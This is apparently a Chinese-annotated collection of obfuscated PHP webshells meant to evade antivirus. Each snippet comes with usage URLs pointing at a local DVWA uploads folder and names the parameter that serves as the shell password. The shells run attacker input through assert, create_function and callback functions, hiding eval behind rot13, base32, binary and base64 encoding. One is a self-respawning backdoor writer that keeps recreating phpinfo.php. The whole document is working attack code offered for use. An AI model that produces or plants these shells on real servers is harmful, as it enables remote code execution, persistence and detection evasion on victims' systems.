<?php
array_map($_GET[func], array($_POST[cmd]));
?>
利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd
-----------------------------------------------------------------------------------------
<?php
$_GET['a']($_POST['b']);
?>
利用方式http://localhost/dvwa/hackable/uploads/nb.php?a=assert 密码为b
-----------------------------------------------------------------------------------------
<?php
$cmd = $_REQUEST['cmd'];
$arr = array($cmd);
$func = $_REQUEST['func'];
array_filter($arr, $func);
?>
利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd
array_filter()
第一个参数为数组,第二个参数为回调函数。这个函数的作用就是将array数组中的每个值传递给回调函数做参数。
-----------------------------------------------------------------------------------------
<?php
$func = create_function('', $_POST['cmd']);
$func();
?>
利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为cmd
create_function的实现步骤:
- 获取参数, 函数体;
- 拼凑一个"function __lambda_func (参数) { 函数体;} "的字符串;
- eval;
- 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错;
- 定义一个函数名:"\000_lambda_" . count(anonymous_functions)++;
- 用新的函数名替换__lambda_func;
- 返回新的函数。
- 参考链接 https://www.t00ls.net/articles-20774.html
(可以做成图片马)
---------------------------------------------------------------------------------------------
<?php
class One{
function Sn0w($x){
$c=str_rot13('n!ff!re!nffreg');
$str=explode('!',$c)[3];
$str($x);
}
}
$test=new One();
$test->Sn0w($_REQUEST['x']);
?>
利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为x
(可以做成图片马)
-----------------------------------------------------------------------------------------
上传一个php文件名为miansha.php
<?php
set_time_limit(1);
ignore_user_abort(true);
$file = 'phpinfo.php';
$shell =
"PD9waHAKCSRzdHIxID0gJ2FIKFVVSChmc2RmSChVVUgoZnNkZixmZGdkZWZqZzBKKXImJUYlKl5HKnQnOwoJJHN0cjIgPSBzdHJ0cigkc3RyMSxhcnJheSgnYUgoVVVIKGZzZGZIKFVVSChmc2RmLCc9PidhcycsJ2ZkZ2RlZmpnMEopJz0+J3NlJywnciYlRiUqXkcqdCc9PidydCcpKTsKCSRzdHIzID0gc3RydHIoJHN0cjIsYXJyYXkoJ3MsJz0+J3MnLCdmZGdkZWZqZzBKKXImJUYlKl5HKic9PidlcicpKTsKCWlmKG1kNShAJF9HRVRbJ2EnXSkgPT0nZTEwYWRjMzk0OWJhNTlhYmJlNTZlMDU3ZjIwZjg4M2UnKXsKCQkkc3RyNCA9IHN0cnJldigkX1BPU1RbJ2EnXSk7CgkJJHN0cjUgPSBzdHJyZXYoJHN0cjQpOwoJCSRzdHIzKCRzdHI1KTsKICAgIH0KPz4=";
while(true){
file_put_contents($file,base64_decode($shell));
usleep(50);
}
?>
利用方式先执行miansha.php就是http://localhost/dvwa/hackable/uploads/miansha.php就会生成一个phpinfo.php文件
再利用http://localhost/dvwa/hackable/uploads/phpinfo.php?a=123456 密码为a
-----------------------------------------------------------------------------------------
<?php
class KUYE{
public $DAXW = null;
public $LRXV = null;
function __construct(){
$this->DAXW = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->LRXV = @SYXJ($this->DAXW);
@eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
}}
new KUYE();
function MNWK($QSFX){
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
$NLHB = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($QSFX); $i < $j; $i++){
$v <<= 8;
$v += ord($QSFX[$i]);
$vbits += 8;
while ($vbits >= 5) {
$vbits -= 5;
$NLHB .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);}}
if ($vbits > 0){
$v <<= (5 - $vbits);
$NLHB .= $BASE32_ALPHABET[$v];}
return $NLHB;}
function SYXJ($QSFX){
$NLHB = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($QSFX); $i < $j; $i++){
$v <<= 5;
if ($QSFX[$i] >= 'a' && $QSFX[$i] <= 'z'){
$v += (ord($QSFX[$i]) - 97);
} elseif ($QSFX[$i] >= '2' && $QSFX[$i] <= '7') {
$v += (24 + $QSFX[$i]);
} else {
exit(1);
}
$vbits += 5;
while ($vbits >= 8){
$vbits -= 8;
$NLHB .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);}}
return $NLHB;}
?>
这是base32编码payload,利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为zero
-----------------------------------------------------------------------------------------
<?php
class KUYE{
public $DAXW = null;
public $LRXV = null;
function __construct(){
$this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 1001111 1010011 1010100 1011011 1111010 1100101 1110010 1101111 1011101 101001 111011';
$this->LRXV = @BinToStr($this->DAXW);
@eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
}}
new KUYE();
function BinToStr($str){
$arr = explode(' ', $str);
foreach($arr as &$v){
$v = pack("H".strlen(base_convert($v, 2, 16)), base_convert($v, 2, 16));
}
return join('', $arr);
}
?>
二进制转化payload,利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为zero
-----------------------------------------------------------------------------------------
<?php
class pure
{
public $a = '';
function __destruct(){
assert("$this->a");
}
}
$b = new pure;
$b->a = $_POST['zero'];
function mysubstr($string, $start = 0, $length = null) {
$result = '';
$strLength = strlen($string);
if ($length === null) {
$length = $strLength;
}
$length = (int) $length;
$start = $start < 0 ? ($strLength + $start) : ($start);
$end = $length < 0 ? ($strLength + $length) : $start + $length;
if ($start > $strLength || ($end - $start) === 0) {
return $result;
}
for (; $start < $end; $start ++) {
$result .= $string[$start];
}
return $result;
}
?>
利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为zero